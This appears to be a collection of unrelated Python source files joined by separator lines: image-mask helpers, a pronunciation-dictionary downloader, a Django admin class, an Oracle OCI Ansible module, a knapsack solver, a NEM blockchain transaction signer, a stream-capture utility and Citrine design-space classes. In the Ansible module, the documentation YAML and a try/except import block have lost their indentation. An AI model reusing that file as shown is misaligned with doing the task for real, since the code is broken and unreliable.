    # where both channels agree (pixels where both are True get cleared;
    # clearing where both are False is a no-op).
    for first in range(count):
        for second in range(first + 1, count):
            a = affordances[first]
            b = affordances[second]
            agreement = masks[a] == masks[b]
            masks[a, agreement] = False
            masks[b, agreement] = False
    return masks
def keepLargestContour(contours):
    """Return a one-element list holding the largest contour by area.

    Input:
        contours - list [cv2 contours]
    Output:
        [contour] - list with one item
    """
    best_idx = 0
    best_area = 0
    for candidate_idx, candidate in enumerate(contours):
        candidate_area = cv2.contourArea(candidate)
        if candidate_area > best_area:
            best_area = candidate_area
            best_idx = candidate_idx
    # On an empty input this raises IndexError, same as the original.
    return [contours[best_idx]]
def erodeMask(affordance_id, masks, kernel):
    """Erode one affordance channel in-place and return the whole stack.

    Input:
        affordance_id - int, channel index into masks
        masks - np.array, shape (affordances, h, w)
        kernel - structuring element for cv2.erode
    """
    masks[affordance_id] = cv2.erode(masks[affordance_id, :, :], kernel)
    return masks
|
from argparse import ArgumentParser
from logging import getLogger
from pathlib import Path
from tempfile import gettempdir
from pronunciation_dict_parser.app.common import \
add_default_output_formatting_arguments
from pronunciation_dict_parser.app.helper import save_dictionary_as_txt
from pronunciation_dict_parser.core.downloading import download
from pronunciation_dict_parser.core.public_dicts import PublicDictType
from pronunciation_dict_parser.core.types import Symbol
def get_downloading_parser(parser: ArgumentParser):
    """Attach the download command's arguments to *parser* and return its handler."""
    parser.description = ""
    default_dictionary_path = Path(gettempdir()) / "pronunciations.dict"
    parser.add_argument(
        "--path", metavar='PATH', type=Path,
        help="file where to output pronunciation dictionary",
        default=default_dictionary_path)
    parser.add_argument(
        "--dictionary", metavar='TYPE', choices=PublicDictType,
        type=PublicDictType.__getitem__, default=PublicDictType.MFA_ARPA,
        help="pronunciation dictionary")
    add_default_output_formatting_arguments(parser)
    parser.add_argument(
        "-o", "--overwrite", action="store_true",
        help="overwrite file if it exists")
    return app_download
def app_download(path: Path, dictionary: PublicDictType, pronunciation_sep: Symbol, symbol_sep: Symbol, include_counter: bool, only_first_pronunciation: bool, encoding: str, empty_symbol: Symbol, overwrite: bool):
    """Download a public pronunciation dictionary and write it as a text file."""
    logger = getLogger(__name__)
    # Refuse to clobber an existing file unless --overwrite was given.
    if not overwrite and path.exists():
        logger.error("File already exists!")
        return
    pronunciation_dict = download(dictionary)
    save_dictionary_as_txt(pronunciation_dict, path, encoding, pronunciation_sep,
                           symbol_sep, include_counter, only_first_pronunciation, empty_symbol)
    logger.info(f"Written dictionary to: {path}")
|
from django.contrib import admin
from .models import HomeBanner
# Register your models here.
@admin.register(HomeBanner)
class PromoCategoryAdmin(admin.ModelAdmin):
    # Admin configuration for HomeBanner records.
    # NOTE(review): class name says "PromoCategory" but it manages HomeBanner —
    # consider renaming for clarity (left unchanged here).
    # Columns shown in the admin changelist view.
    list_display = (
        'id', 'describe', 'show_time', 'hide_time', 'banner_h5', 'script_h5', 'banner_pc', 'script_pc',
        'sort')
    # Fields matched by the admin search box.
    search_fields = ('describe', 'show_time',)
|
#!/usr/bin/python
# Copyright (c) 2017, 2020 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN
from __future__ import absolute_import, division, print_function
__metaclass__ = type
# Standard Ansible module metadata (generated file — see the header above).
ANSIBLE_METADATA = {
    "metadata_version": "1.1",
    "status": ["preview"],
    "supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_file_storage_snapshot_facts
short_description: Fetches details about one or multiple Snapshot resources in Oracle Cloud Infrastructure
description:
- Fetches details about one or multiple Snapshot resources in Oracle Cloud Infrastructure
- Lists snapshots of the specified file system.
- If I(snapshot_id) is specified, the details of a single Snapshot will be returned.
version_added: "2.9"
author: Oracle (@oracle)
options:
snapshot_id:
description:
- The OCID of the snapshot.
- Required to get a specific snapshot.
type: str
aliases: ["id"]
file_system_id:
description:
- The OCID of the file system.
- Required to list multiple snapshots.
type: str
lifecycle_state:
description:
- Filter results by the specified lifecycle state. Must be a valid
state for the resource type.
type: str
choices:
- "CREATING"
- "ACTIVE"
- "DELETING"
- "DELETED"
- "FAILED"
sort_order:
description:
- The sort order to use, either 'asc' or 'desc', where 'asc' is
ascending and 'desc' is descending. The default order is 'desc'
except for numeric values.
type: str
choices:
- "ASC"
- "DESC"
extends_documentation_fragment: [ oracle.oci.oracle, oracle.oci.oracle_name_option ]
"""
EXAMPLES = """
- name: List snapshots
oci_file_storage_snapshot_facts:
file_system_id: ocid1.filesystem.oc1..xxxxxxEXAMPLExxxxxx
- name: Get a specific snapshot
oci_file_storage_snapshot_facts:
snapshot_id: ocid1.snapshot.oc1..xxxxxxEXAMPLExxxxxx
"""
RETURN = """
snapshots:
description:
- List of Snapshot resources
returned: on success
type: complex
contains:
file_system_id:
description:
- The OCID of the file system from which the snapshot
was created.
returned: on success
type: string
sample: ocid1.filesystem.oc1..xxxxxxEXAMPLExxxxxx
id:
description:
- The OCID of the snapshot.
returned: on success
type: string
sample: ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx
lifecycle_state:
description:
- The current state of the snapshot.
returned: on success
type: string
sample: CREATING
name:
description:
- Name of the snapshot. This value is immutable.
- Avoid entering confidential information.
- "Example: `Sunday`"
returned: on success
type: string
sample: Sunday
time_created:
description:
- The date and time the snapshot was created, expressed
in L(RFC 3339,https://tools.ietf.org/rfc/rfc3339) timestamp format.
- "Example: `2016-08-25T21:10:29.600Z`"
returned: on success
type: string
sample: 2016-08-25T21:10:29.600Z
freeform_tags:
description:
- "Free-form tags for this resource. Each tag is a simple key-value pair
with no predefined name, type, or namespace.
For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
Example: `{\\"Department\\": \\"Finance\\"}`"
returned: on success
type: dict
sample: {'Department': 'Finance'}
defined_tags:
description:
- "Defined tags for this resource. Each key is predefined and scoped to a namespace.
For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
Example: `{\\"Operations\\": {\\"CostCenter\\": \\"42\\"}}`"
returned: on success
type: dict
sample: {'Operations': {'CostCenter': 'US'}}
sample: [{
"file_system_id": "ocid1.filesystem.oc1..xxxxxxEXAMPLExxxxxx",
"id": "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx",
"lifecycle_state": "CREATING",
"name": "Sunday",
"time_created": "2016-08-25T21:10:29.600Z",
"freeform_tags": {'Department': 'Finance'},
"defined_tags": {'Operations': {'CostCenter': 'US'}}
}]
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.oracle.oci.plugins.module_utils import oci_common_utils
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
OCIResourceFactsHelperBase,
get_custom_class,
)
try:
from oci.file_storage import FileStorageClient
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class SnapshotFactsHelperGen(OCIResourceFactsHelperBase):
    """Supported operations: get, list"""
    # NOTE: generated code (see file header) — change the generator, not this file.
    def get_required_params_for_get(self):
        # A single snapshot is addressed by its OCID.
        return [
            "snapshot_id",
        ]
    def get_required_params_for_list(self):
        # Listing requires the parent file system's OCID.
        return [
            "file_system_id",
        ]
    def get_resource(self):
        # Fetch one snapshot, retrying with backoff via the common utils.
        return oci_common_utils.call_with_backoff(
            self.client.get_snapshot, snapshot_id=self.module.params.get("snapshot_id"),
        )
    def list_resources(self):
        # Forward only the optional filters the user actually supplied.
        optional_list_method_params = [
            "lifecycle_state",
            "sort_order",
            "name",
        ]
        optional_kwargs = dict(
            (param, self.module.params[param])
            for param in optional_list_method_params
            if self.module.params.get(param) is not None
        )
        return oci_common_utils.list_all_resources(
            self.client.list_snapshots,
            file_system_id=self.module.params.get("file_system_id"),
            **optional_kwargs
        )
# Deployments may register a custom class to override generated behavior.
SnapshotFactsHelperCustom = get_custom_class("SnapshotFactsHelperCustom")
class ResourceFactsHelper(SnapshotFactsHelperCustom, SnapshotFactsHelperGen):
    # Custom class listed first so its overrides win in the MRO.
    pass
def main():
    """Ansible entry point: build the arg spec, dispatch get/list, emit facts."""
    module_args = oci_common_utils.get_common_arg_spec()
    module_args.update(
        dict(
            snapshot_id=dict(aliases=["id"], type="str"),
            file_system_id=dict(type="str"),
            lifecycle_state=dict(
                type="str",
                choices=["CREATING", "ACTIVE", "DELETING", "DELETED", "FAILED"],
            ),
            sort_order=dict(type="str", choices=["ASC", "DESC"]),
            name=dict(type="str"),
        )
    )
    module = AnsibleModule(argument_spec=module_args)
    if not HAS_OCI_PY_SDK:
        module.fail_json(msg="oci python sdk required for this module.")
    resource_facts_helper = ResourceFactsHelper(
        module=module,
        resource_type="snapshot",
        service_client_class=FileStorageClient,
        namespace="file_storage",
    )
    result = []
    # snapshot_id present -> single get; file_system_id present -> list.
    if resource_facts_helper.is_get():
        result = [resource_facts_helper.get()]
    elif resource_facts_helper.is_list():
        result = resource_facts_helper.list()
    else:
        resource_facts_helper.fail()
    module.exit_json(snapshots=result)
if __name__ == "__main__":
    main()
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-strict
from dataclasses import dataclass
from enum import Enum
from typing import Any, Dict, List, Mapping, Optional
from dataclasses_json import dataclass_json
from fbpcs.entity.container_instance import ContainerInstance
from fbpcs.entity.instance_base import InstanceBase
class MPCRole(Enum):
    """Side of the MPC computation this party plays."""
    SERVER = "SERVER"
    CLIENT = "CLIENT"
class MPCInstanceStatus(Enum):
    """Lifecycle state of an MPC instance."""
    UNKNOWN = "UNKNOWN"
    CREATED = "CREATED"
    STARTED = "STARTED"
    COMPLETED = "COMPLETED"
    FAILED = "FAILED"
    CANCELED = "CANCELED"
@dataclass_json
@dataclass
class MPCInstance(InstanceBase):
    """State of one MPC run: game, role, workers, containers and status."""
    instance_id: str
    game_name: str
    mpc_role: MPCRole
    num_workers: int
    server_ips: Optional[List[str]]
    containers: List[ContainerInstance]
    status: MPCInstanceStatus
    game_args: Optional[List[Dict[str, Any]]]
    arguments: Mapping[str, Any]
    def __init__(
        self,
        instance_id: str,
        game_name: str,
        mpc_role: MPCRole,
        num_workers: int,
        ip_config_file: Optional[str] = None,
        server_ips: Optional[List[str]] = None,
        containers: Optional[List[ContainerInstance]] = None,
        status: MPCInstanceStatus = MPCInstanceStatus.UNKNOWN,
        game_args: Optional[List[Dict[str, Any]]] = None,
        **arguments # pyre-ignore
    ) -> None:
        # Hand-written __init__ (replacing the dataclass-generated one) so
        # arbitrary extra keyword args can be captured into `arguments`.
        self.instance_id = instance_id
        self.game_name = game_name
        self.mpc_role = mpc_role
        self.num_workers = num_workers
        # NOTE(review): ip_config_file is not declared as a dataclass field
        # above, so it is presumably excluded from JSON (de)serialization —
        # confirm that is intentional.
        self.ip_config_file = ip_config_file
        self.server_ips = server_ips
        self.containers = containers or []
        self.status = status
        self.game_args = game_args
        self.arguments = arguments
    def get_instance_id(self) -> str:
        return self.instance_id
    def __str__(self) -> str:
        # pyre-ignore
        return self.to_json()
|
def knapsack(max_weight, weights, values, n):
    """Solve the 0/1 knapsack problem with bottom-up dynamic programming.

    Args:
        max_weight: knapsack capacity (non-negative int).
        weights: item weights; weights[i] belongs to item i.
        values: item values; values[i] belongs to item i.
        n: number of items to consider (typically len(values)).

    Returns:
        Maximum total value achievable without exceeding max_weight.
    """
    # cache[i][j] = best value using the first i items with capacity j.
    cache = [[0 for _ in range(max_weight + 1)] for _ in range(n + 1)]
    # i iterates over values
    for i in range(n + 1):
        # j iterates over different max weight values
        for j in range(max_weight + 1):
            if i == 0 or j == 0:
                cache[i][j] = 0  # no items or no capacity
            elif j >= weights[i - 1]:
                # Take item i-1 (gain value, lose weight) or skip it.
                cache[i][j] = max(cache[i - 1][j - weights[i - 1]] + values[i - 1],
                                  cache[i - 1][j])
            else:
                cache[i][j] = cache[i - 1][j]
    # Index explicitly instead of relying on the leaked loop variables i and j,
    # which is fragile and breaks (NameError) if the loops never run.
    return cache[n][max_weight]
if __name__ == '__main__':
    # Demo run: the best pick is items of weight 8, 16 and 40 -> value 350.
    val = [50, 100, 150, 200]
    wt = [8, 16, 32, 40]
    W = 64
    n = len(val)
    print(knapsack(W, wt, val, n))
|
# -*- coding: utf-8 -*-
import base64
import hashlib
import sys
import binascii
import ed25519
sys.path.insert(0, 'python-sha3')
from python_sha3 import *
from .helper import *
from config import config
import datetime
import struct
import binascii
import requests
import json
import time
def getTimeStamp(delta=0):
    """Seconds elapsed since the NEM network epoch, shifted by *delta*."""
    nem_epoch_seconds = 1427587585  # NEM nemesis block timestamp (2015-03-29 UTC)
    now = int(time.time())
    return now - nem_epoch_seconds + delta
def post(nis, url, data):
    """POST *data* as a JSON body to the NIS node at nis+url (10 s timeout)."""
    payload = json.dumps(data)
    json_headers = {'Content-type': 'application/json'}
    return requests.post(nis + url, data=payload, headers=json_headers, timeout=10)
def int2hex(i: int):
    """Hex encoding of *i* as a little-endian unsigned 32-bit integer."""
    return struct.pack('<I', i).hex()
def long2hex(i: int):
    """Hex encoding of *i* as a little-endian signed 64-bit integer."""
    return struct.pack('<q', i).hex()
def string2hex(string: str):
    """Hex encoding of the UTF-8 bytes of *string*."""
    return string.encode('utf-8').hex()
def pvtkey2pubkey(pvtkey :str):
    """Derive the hex-encoded ed25519 public key from a hex private key.

    The private key bytes are reversed before hashing; sha3_512 here comes
    from the bundled python-sha3 module (presumably Keccak-512, as used by
    NEM — confirm against python-sha3), not hashlib.
    """
    binpvtkey = binascii.unhexlify(pvtkey)[::-1]
    binpubkey = ed25519.publickey_hash_unsafe(binpvtkey , sha3_512)
    return binascii.hexlify(binpubkey).decode('utf-8')
def pubkey2addr(pubkey: str, version="main"):
    """Convert a hex-encoded public key to a base32 NEM address.

    Pipeline: SHA3/Keccak-256 of the key -> RIPEMD-160 -> prepend the network
    version byte -> append a 4-byte checksum -> base32 encode.

    Args:
        pubkey: hex-encoded public key.
        version: network name: 'main' (0x68), 'test' (0x98) or 'mijin' (0x60).

    Raises:
        ValueError: if *version* is not a known network name.
    """
    pubkey = binascii.unhexlify(pubkey)
    s = sha3_256()
    s.update(pubkey)
    sha3_pubkey = s.digest()
    h = hashlib.new('ripemd160')
    h.update(sha3_pubkey)
    ripe = h.digest()
    if version == 'main':
        versionHex = "68" + ripe.hex()
    elif version == 'test':
        versionHex = "98" + ripe.hex()
    elif version == 'mijin':
        versionHex = "60" + ripe.hex()
    else:
        # Previously an unknown version fell through and crashed later with
        # NameError on versionHex; fail with a clear message instead.
        raise ValueError("unknown network version: {!r}".format(version))
    versionHex = binascii.unhexlify(versionHex)
    s2 = sha3_256()
    s2.update(versionHex)
    checksum = s2.digest()[0:4]
    address = base64.b32encode(versionHex + checksum)
    return address.decode('utf-8')
def announceTransaction(data, nis):
    """Broadcast a signed transaction payload to a NIS node's announce endpoint."""
    return post(nis, '/transaction/announce', data)
def signTransaction(hexString, pvtkey):
    """Sign a serialized transaction hex string with an ed25519 private key.

    Returns the NIS announce payload: {"data": <tx hex>, "signature": <hex>}.
    """
    # NEM reverses the raw private-key bytes before use (see pvtkey2pubkey).
    binpvtkey = binascii.unhexlify(pvtkey)[::-1]
    binpubkey = binascii.unhexlify(pvtkey2pubkey(pvtkey))
    signature = ed25519.signature_hash_unsafe(binascii.unhexlify(hexString), binpvtkey, binpubkey, sha3_512)
    signed_data = {"data": hexString, "signature": signature.hex()}
    return signed_data
# https://nemproject.github.io
def createTransaction(t):
    """Serialize a NEM transaction dict *t* into its wire-format hex string.

    Builds the common header (type, version, timestamp, signer, fee, deadline)
    and appends the type-specific body.

    Raises:
        ValueError: if t["type"] is not a supported transaction type.
    """
    feeHex = long2hex(t["fee"])
    timestampHex = int2hex(t["timeStamp"])
    deadlineHex = int2hex(t["deadline"])
    transactionTypeHex = int2hex(t["type"])
    # Transfer and aggregate-modification transactions use a version bumped
    # by 1 (the boolean adds 0 or 1).
    version = t["version"] + (t["type"]==TransactionType.transfer_transaction or t["type"]==TransactionType.multisig_aggregate_modification_transfer_transaction)
    versionHex = int2hex(version)
    pubkeyLengthHex = int2hex(len(t["signer"])//2)
    hexString = transactionTypeHex + versionHex + timestampHex + pubkeyLengthHex + t["signer"] + feeHex + deadlineHex
    if t["type"] == TransactionType.transfer_transaction:
        hexString += createTransferPart(t["recipient"], t["amount"], t["message"], t["mosaics"])
    elif t["type"] == TransactionType.importance_transfer_transaction:
        hexString += createImportanceTransferPart(t["mode"],t["remoteAccount"])
    elif t["type"] == TransactionType.multisig_aggregate_modification_transfer_transaction:
        hexString += createMultisigAggregateModificationTransferPart(t["modifications"], t["minCosignatories"])
    elif t["type"] == TransactionType.multisig_signature_transaction:
        hexString += createMultisigSignaturePart(t["otherHash"], t["otherAccount"])
    elif t["type"] == TransactionType.multisig_transaction:
        hexString += createMultisigPart(t["inner"])
    elif t["type"] == TransactionType.provision_namespace_transaction:
        hexString += createProvisionNamespaceTransactionPart(RentalFeeSink(versionHex), t["newPart"], t["parent"])
    elif t["type"] == TransactionType.mosaic_definition_creation_transaction:
        hexString += createMosaicDefinitionCreationTransactionPart(CreationFeeSink(versionHex), t["mosaicDefinition"])
    elif t["type"] == TransactionType.mosaic_supply_change_transaction:
        hexString += createMosaicSupplyChangeTransactionPart(t["supplyType"], t["delta"], t["mosaicId"])
    else:
        # A bare `raise` outside an except block is itself a RuntimeError;
        # raise something meaningful instead.
        raise ValueError("unsupported transaction type: {!r}".format(t["type"]))
    return hexString
def createTransferPart(recipientAddressString, amount, message, mosaics):
    """Serialize the transfer-transaction body.

    Layout: recipient (length-prefixed), amount, optional message field
    (total length, type, payload length, payload), then the mosaic count
    followed by one length-prefixed structure per attached mosaic.
    """
    recipientAddressHex = string2hex(recipientAddressString)
    recipientAddressLengthHex = int2hex(len(recipientAddressHex)//2)
    amountHex = long2hex(amount)
    messageTypeHex = int2hex(message["type"])
    payloadHex = string2hex(message["payload"])
    hexString = recipientAddressLengthHex + recipientAddressHex + amountHex
    if len(payloadHex) > 0:
        # TODO ENCRYPTION (only plain-text messages are serialized here)
        payloadLengthHex = int2hex(len(payloadHex)//2)
        messageFieldLengthHex = int2hex(len(messageTypeHex + payloadLengthHex + payloadHex)//2)
        hexString += messageFieldLengthHex + messageTypeHex + payloadLengthHex + payloadHex
    else:
        # Empty message: field length 0, no type/payload bytes at all.
        messageFieldLengthHex = int2hex(0)
        hexString += messageFieldLengthHex
    mosaicsNumberHex = int2hex(len(mosaics))
    hexString += mosaicsNumberHex
    for mosaic in mosaics:
        quantityHex = long2hex(mosaic["quantity"])
        namespaceIdStringHex = string2hex(mosaic["mosaicId"]["namespaceId"])
        mosaicNameStringHex = string2hex(mosaic["mosaicId"]["name"])
        namespaceIdStringLength = len(namespaceIdStringHex)//2
        mosaicNameStringLength = len(mosaicNameStringHex)//2
        namespaceIdStringLengthHex = int2hex(namespaceIdStringLength)
        mosaicNameStringLengthHex = int2hex(mosaicNameStringLength)
        # Each inner string is preceded by its own 4-byte length field.
        mosaicIdStructureLength = 4+namespaceIdStringLength+4+mosaicNameStringLength
        mosaicIdStructureLengthHex = int2hex(mosaicIdStructureLength)
        # 4 bytes id-structure length + id structure + 8-byte quantity.
        mosaicStructureLengthHex = int2hex(4+mosaicIdStructureLength+8)
        mosaicHex = mosaicStructureLengthHex + mosaicIdStructureLengthHex
        mosaicHex += namespaceIdStringLengthHex + namespaceIdStringHex
        mosaicHex += mosaicNameStringLengthHex + mosaicNameStringHex
        mosaicHex += quantityHex
        hexString += mosaicHex
    return hexString
def createImportanceTransferPart(mode, remoteAccount):
    """Serialize the importance-transfer body: mode, key length (0x20), key."""
    return int2hex(mode) + int2hex(0x20) + remoteAccount
def createMultisigAggregateModificationTransferPart(modifications, minCosignatories):
    """Serialize cosignatory modifications plus the min-cosignatories change."""
    parts = [int2hex(len(modifications))]
    for modification in modifications:
        # Each modification: structure length 0x28, type, key length 0x20, key.
        parts.append(int2hex(0x28) + int2hex(modification["modificationType"])
                     + int2hex(0x20) + modification["cosignatoryAccount"])
    # Trailing 4-byte field holding the relative min-cosignatories change.
    parts.append(int2hex(0x04) + int2hex(minCosignatories["relativeChange"]))
    return ''.join(parts)
def createMultisigSignaturePart(otherHash, otherAccount):
    """Serialize a multisig-signature body: hash object + signer address."""
    pieces = (int2hex(0x24), int2hex(0x20), otherHash["data"],
              int2hex(0x28), string2hex(otherAccount))
    return ''.join(pieces)
def createProvisionNamespaceTransactionPart(rentalFeeSink, newPart, parent):
    """Serialize a provision-namespace body.

    Root namespaces (no parent) pay RentalFee.root and encode 0xffffffff in
    place of the parent string; sub-namespaces pay RentalFee.sub.
    """
    if parent:
        rentalFee = RentalFee.sub
    else:
        rentalFee = RentalFee.root
    hexString = int2hex(0x28) + string2hex(rentalFeeSink) + long2hex(rentalFee)
    newPartString = string2hex(newPart)
    hexString += int2hex(len(newPartString)//2) + newPartString
    if parent:
        parentString = string2hex(parent)
        hexString += int2hex(len(parentString)//2) + parentString
    else:
        # Sentinel meaning "no parent" (root namespace).
        hexString += int2hex(0xffffffff)
    return hexString
def createMosaicDefinitionCreationTransactionPart(creationFeeSink, mosaicDefinition):
    """Serialize a mosaic-definition-creation body.

    Raises:
        ValueError: if the creator public key is not 64 hex characters.
    """
    if len(mosaicDefinition["creator"]) != 64:
        # Was a bare `raise`, which itself fails with RuntimeError outside an
        # except block; raise a descriptive error instead.
        raise ValueError("mosaicDefinition['creator'] must be 64 hex characters")
    hexString = int2hex(0x20) + mosaicDefinition["creator"]
    # start mosaicDefinition
    namespaceIdStringHex = string2hex(mosaicDefinition["id"]["namespaceId"])
    mosaicNameStringHex = string2hex(mosaicDefinition["id"]["name"])
    mosaicIdStructureHex = int2hex(len(namespaceIdStringHex)//2) + namespaceIdStringHex + int2hex(len(mosaicNameStringHex)//2) + mosaicNameStringHex
    hexString += int2hex(len(mosaicIdStructureHex)//2) + mosaicIdStructureHex
    descriptionStringHex = string2hex(mosaicDefinition["description"])
    hexString += int2hex(len(descriptionStringHex)//2) + descriptionStringHex
    hexString += int2hex(len(mosaicDefinition["properties"]))
    for prop in mosaicDefinition["properties"]:
        propNameHex = string2hex(prop["name"])
        propValueHex = string2hex(prop["value"])
        propStructureHex = int2hex(len(propNameHex)//2) + propNameHex + int2hex(len(propValueHex)//2) + propValueHex
        hexString += int2hex(len(propStructureHex)//2) + propStructureHex
    if "levy" in mosaicDefinition:
        hexString += int2hex(0) # TODO LEVY (levy serialization not implemented)
    else:
        hexString += int2hex(0)
    # end mosaicDefinition
    hexString = int2hex(len(hexString)//2) + hexString
    hexString += int2hex(0x28) + string2hex(creationFeeSink)
    hexString += long2hex(CreationFee.mosaic)
    # (leftover debug print of the serialized hex removed)
    return hexString
def createMosaicSupplyChangeTransactionPart(supplyType, delta, mosaicId):
    """Serialize a supply-change body: mosaic id structure, supply type, delta."""
    nsHex = string2hex(mosaicId["namespaceId"])
    nameHex = string2hex(mosaicId["name"])
    mosaicIdStructureHex = (int2hex(len(nsHex) // 2) + nsHex
                            + int2hex(len(nameHex) // 2) + nameHex)
    result = int2hex(len(mosaicIdStructureHex) // 2) + mosaicIdStructureHex
    result += int2hex(supplyType)
    result += long2hex(delta)
    return result
def createMultisigPart(inner):
    """Serialize an inner transaction prefixed with its byte length."""
    innerHex = createTransaction(inner)
    innerLengthHex = int2hex(len(innerHex) // 2)
    return innerLengthHex + innerHex
|
import os, sys
# import threading
# t_data = threading.local()
# Stack of (stdout, stderr) pairs; the bottom entry holds the real streams.
capture_stack = None
# Module-wide StdCapture instance installed by configure().
capture_manager = None
def configure():
    """Initialise the module-level capture stack and capture manager."""
    thismodule = sys.modules[__name__]
    # Seed the stack with the real std streams so _end_capture can restore them.
    initial_stack = [(sys.__stdout__, sys.__stderr__)]
    setattr(thismodule, 'capture_stack', initial_stack)
    setattr(thismodule, 'capture_manager', StdCapture())
    # t_data.capture_stack = _capture_stack
# t_data.capture_stack = _capture_stack
def desconfigure():
    """Reset capture state and restore the real stdout/stderr.

    (Public name kept as-is despite the 'deconfigure' typo — callers depend on it.)
    """
    thismodule = sys.modules[__name__]
    _capture_stack = []
    _capture_stack.append((sys.__stdout__, sys.__stderr__))
    # (duplicate re-assignment of thismodule removed)
    setattr(thismodule, 'capture_stack', _capture_stack)
    _capture_manager = StdCapture()
    setattr(thismodule, 'capture_manager', _capture_manager)
    # t_data.capture_stack = _capture_stack
    sys.stdout = sys.__stdout__
    sys.stderr = sys.__stderr__
def get_capture():
    """Return the module-level StdCapture manager."""
    return sys.modules[__name__].capture_manager
def get_capture_mng(out=None, err=None):
    """Return the shared capture manager with its targets set to out/err."""
    manager = get_capture()
    manager.curr_out = out
    manager.curr_err = err
    return manager
def start_capture(out=None, err=None):
    """Start redirecting stdout/stderr into out/err (discarded if None)."""
    manager = get_capture()
    manager.curr_out = out
    manager.curr_err = err
    manager._start_capture()
    return manager
def stop_capture():
    """Pop the current capture and restore the previous streams."""
    manager = get_capture()
    manager._end_capture()
    return manager
class DummyFile(object):
    """File-like sink that silently discards everything written to it."""
    def write(self, x):
        pass
class StdCapture:
    """Redirects sys.stdout/sys.stderr using the module-level capture stack."""
    def __init__(self):
        # Targets for the next capture; DummyFile() is substituted if left None.
        self.curr_out = None
        self.curr_err = None
    def _start_capture(self):
        """Push the current targets onto the stack and install them as std streams."""
        if self.curr_out is None:
            self.curr_out = DummyFile()
        if self.curr_err is None:
            self.curr_err = DummyFile()
        thismodule = sys.modules[__name__]
        thismodule.capture_stack.append((self.curr_out, self.curr_err))
        sys.stdout = self.curr_out
        sys.stderr = self.curr_err
        return self
    def _end_capture(self):
        """Pop this capture and restore the previous streams from the stack."""
        thismodule = sys.modules[__name__]
        thismodule.capture_stack.pop()
        (out, err) = thismodule.capture_stack[-1]
        self.curr_out = out
        self.curr_err = err
        sys.stdout = out
        sys.stderr = err
        return self
    def __enter__(self, *args, **kwargs):
        self._start_capture()
        # Bug fix: return self so `with StdCapture() as c:` binds the manager
        # instead of None.
        return self
    def __exit__(self, exc_type, exc_val, exc_tb, *args, **kwargs):
        self._end_capture()
|
from .Postgres import PostgresDataHandler
|
"""Tools for working with design spaces."""
from typing import Any, List, Mapping, Type
from uuid import UUID
from citrine._rest.resource import Resource
from citrine._serialization import properties
from citrine._serialization.polymorphic_serializable import PolymorphicSerializable
from citrine._serialization.serializable import Serializable
from citrine._session import Session
from citrine.informatics.descriptors import Descriptor
from citrine.informatics.dimensions import Dimension
from citrine.informatics.modules import Module
__all__ = ['DesignSpace', 'ProductDesignSpace', 'EnumeratedDesignSpace']
class DesignSpace(Module):
    """A Citrine Design Space - an abstract type that returns the proper
    subtype based on the 'type' value of the passed in dict.
    """
    _response_key = None
    @classmethod
    def get_type(cls, data) -> Type[Serializable]:
        """Return the subtype."""
        # 'Univariate' is the server-side type name for a product design space.
        # An unknown type raises KeyError here.
        return {
            'Univariate': ProductDesignSpace,
            'EnumeratedDesignSpace': EnumeratedDesignSpace,
        }[data['config']['type']]
class ProductDesignSpace(Resource['ProductDesignSpace'], DesignSpace):
    """Design space composed of an outer product of univariate dimensions, either continuous or enumerated.
    Parameters
    ----------
    name:str
        the name of the design space
    description:str
        the description of the design space
    dimensions: list[Dimension]
        univariate dimensions that are factors of the design space; can be enumerated or continuous
    """
    _response_key = None
    # Serialization property descriptors mapping attributes onto the API payload.
    uid = properties.Optional(properties.UUID, 'id', serializable=False)
    name = properties.String('config.name')
    description = properties.Optional(properties.String(), 'config.description')
    dimensions = properties.List(properties.Object(Dimension), 'config.dimensions')
    typ = properties.String('config.type', default='Univariate', deserializable=False)
    status = properties.String('status', serializable=False)
    status_info = properties.Optional(
        properties.List(properties.String()),
        'status_info',
        serializable=False
    )
    active = properties.Boolean('active', default=True)
    # NOTE: These could go here or in _post_dump - it's unclear which is better right now
    module_type = properties.String('module_type', default='DESIGN_SPACE')
    schema_id = properties.UUID('schema_id', default=UUID('6c16d694-d015-42a7-b462-8ef299473c9a'))
    def __init__(self,
                 name: str,
                 description: str,
                 dimensions: List[Dimension],
                 # NOTE(review): Session() as a default is evaluated once at
                 # import and shared by every instance — confirm intentional.
                 session: Session = Session()):
        self.name: str = name
        self.description: str = description
        self.dimensions: List[Dimension] = dimensions
        self.session: Session = session
    def _post_dump(self, data: dict) -> dict:
        # The API expects the name duplicated at the top level as display_name.
        data['display_name'] = data['config']['name']
        return data
    def __str__(self):
        return '<ProductDesignSpace {!r}>'.format(self.name)
class EnumeratedDesignSpace(Resource['EnumeratedDesignSpace'], DesignSpace):
    """Design space composed of an explicit enumeration of candidate materials to score. Note that every candidate must have exactly the descriptors in the list populated (no more, no less) to be included.
    Parameters
    ----------
    name:str
        the name of the design space
    description:str
        the description of the design space
    descriptors: list[Descriptor]
        the list of descriptors included in the candidates of the design space
    data: list[dict]
        list of dicts of the shape `{<descriptor_key>: <descriptor_value>}` where each dict corresponds to a candidate
        in the design space
    """
    _response_key = None
    # Serialization property descriptors mapping attributes onto the API payload.
    uid = properties.Optional(properties.UUID, 'id', serializable=False)
    name = properties.String('config.name')
    description = properties.Optional(properties.String(), 'config.description')
    descriptors = properties.List(properties.Object(Descriptor), 'config.descriptors')
    data = properties.List(properties.Mapping(properties.String, properties.Raw), 'config.data')
    typ = properties.String('config.type', default='EnumeratedDesignSpace', deserializable=False)
    status = properties.String('status', serializable=False)
    status_info = properties.Optional(
        properties.List(properties.String()),
        'status_info',
        serializable=False
    )
    active = properties.Boolean('active', default=True)
